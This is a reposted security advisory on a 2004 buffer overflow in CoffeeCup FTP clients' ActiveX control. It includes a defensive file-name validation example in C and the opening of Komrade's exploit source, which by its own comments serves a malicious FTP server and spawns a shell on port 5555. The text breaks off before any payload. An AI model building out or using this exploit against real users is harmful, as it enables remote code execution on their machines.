CoffeeCup FTP Client Remote Buffer Overflow Vulnerability

2008-04-09 04:22:01 Source: Internet

Published: 2004-11-22
Updated: 2004-11-23

Affected systems:
CoffeeCup Software CoffeeCup Direct FTP 6.2.0.62
CoffeeCup Software CoffeeCup Free FTP 3.0.0.10
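Description:
CoffeeCup FTP is a client program for the Windows operating system.

A plug-in used by CoffeeCup FTP is flawed. A remote attacker can exploit this vulnerability to trigger a buffer overflow in the program and may be able to execute arbitrary instructions with the privileges of the process.

CoffeeCup FTP uses the "WeOnlyDo! COM Ftp DELUXE" ActiveX control to communicate with FTP servers. Because this plug-in (WodFtpDLX.ocx) does not correctly handle overlong file name data sent by the FTP server, a buffer overflow can occur, and carefully constructed file name data may execute arbitrary instructions with the privileges of the process.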

<*Source: Komrade (unsecure@altervista.org)

Link: http://unsecure.altervista.org/security/coffeecup.htm
*>
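The flaw class described above is a server-supplied file name copied into a fixed-size buffer without a length check. The following added example, which is not code from the advisory or from the WeOnlyDo control, shows a client-side parser that rejects overlong or malformed names instead of copying them. The Unix-style LIST layout, the `MAX_NAME` limit and all function names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_NAME 255 /* assumed client-side limit, not taken from the advisory */

/* Skip n space-separated fields; return the start of the next field or NULL. */
static const char *skip_fields(const char *p, int n)
{
    while (n-- > 0) {
        while (*p == ' ') p++;
        if (*p == '\0') return NULL;
        while (*p != '\0' && *p != ' ') p++;
    }
    while (*p == ' ') p++;
    return *p ? p : NULL;
}

/* Copy the file name of one Unix-style LIST line into out.
 * Returns 0 on success, -1 if the line is malformed or the name does not fit.
 * Overlong names are rejected, never truncated or copied past out_sz. */
int list_filename(const char *line, char *out, size_t out_sz)
{
    const char *name;
    size_t len, i;

    if (line == NULL || out == NULL || out_sz == 0) return -1;
    out[0] = '\0';
    name = skip_fields(line, 8); /* perms, links, owner, group, size, 3 date fields */
    if (name == NULL) return -1;
    len = strcspn(name, "\r\n");
    if (len == 0 || len > MAX_NAME || len >= out_sz) return -1;
    for (i = 0; i < len; i++) /* no control bytes or path separators in a name */
        if ((unsigned char)name[i] < 0x20 || name[i] == '/' || name[i] == '\\')
            return -1;
    memcpy(out, name, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample line, not captured from a real server. */
    char out[64];
    int rc = list_filename("-rw-r--r-- 1 ftp ftp 1024 Nov 22 2004 index.html\r\n",
                           out, sizeof out);
    printf("rc=%d name=%s\n", rc, out);
    return 0;
}
```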

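Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

Komrade (unsecure@altervista.org) provided the following test method: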

/*******************************************************************************************************

CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
created by Komrade
e-mail: unsecure(at)altervista(dot)org
web: http://unsecure.altervista.org

Tested on:
CoffeeCup Direct FTP 6.2.0.62
CoffeeCup Free FTP 3.0.0.10

on a Windows XP Professional sp2 operating system.

This exploit creates a fake FTP server on your machine, waiting for the
connection of an FTP client.
After the exploit is sent a shell (command prompt) is spawn on port 5555
of the target machine.
This exploit works locally or remotely.

Usage: coffecupbof [direct | free] [-l] [-r server IP]

Options:
direct | free "direct" to exploit a CoffeeCup Direct FTP client
"free" to exploit a CoffeeCup Free FTP client
-l executed locally
-r serverIP executed remotely. You need to specify the address
of the FTP server for the PASV command (Insert your IP address)

Examples:

C:\> coffeecupbof direct -l exploit for CoffeeCup Direct FTP executed locally
C:\> coffeecupbof free -r 10.0.0.1 exploit for CoffeeCup Free FTP executed remotely

*******************************************************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define FTP_PORT 21
#define PASV_PORT 1106

int version, wait = TRUE;

DWORD WINAPI fileList(LPVOID data);

int main(int argc,char **argv){

SOCKET sock, client;
struct sockaddr_in sock_addr,client_addr;
WSADATA data;
WORD p;
char mess[4096], received[512], addr[32];
int lun, n, i, err;
HANDLE fileListH;
DWORD fileListId, exitCode;

p = MAKEWORD(2, 0);
WSAStartup(p, &data);

printf("------------------------------------------------------------------------------\r\n");
printf("\tCoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");

printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n");
printf("------------------------------------------------------------------------------\r\n\r\n");

if (((argc != 2) || (strcmp(argv[1], "direct") != 0) || (strcmp(argv[1], "free") != 0)) && ((argc != 3) || (strcmp(argv[2], "-l") != 0)) && ((argc != 4) || (strcmp(argv[2], "-r") != 0))){
printf("Usage: coffecupbof [direct | free] [-l] [-r server IP]\r\n\r\n");
printf("Options:\r\n");
printf(" direct | free\t\"direct\" to exploit a CoffeeCup Direct FTP client\r\n");
printf(" \t\t\"free\" to exploit a CoffeeCup Free FTP client\r\n");
printf(" -l\t\tworks locally.\r\n");
printf(" -r server IP\tworks remotely. You need to specify the address of the\r\n");
printf("\t\tFTP server for the PASV command (Insert your IP address)\r\n\r\n");
printf("Examples:\r\n");
printf(" coffeecupbof direct -l\t\texploit for CoffeeCup Direct FTP\r\n\t\t\t\texecuted locally\r\n");
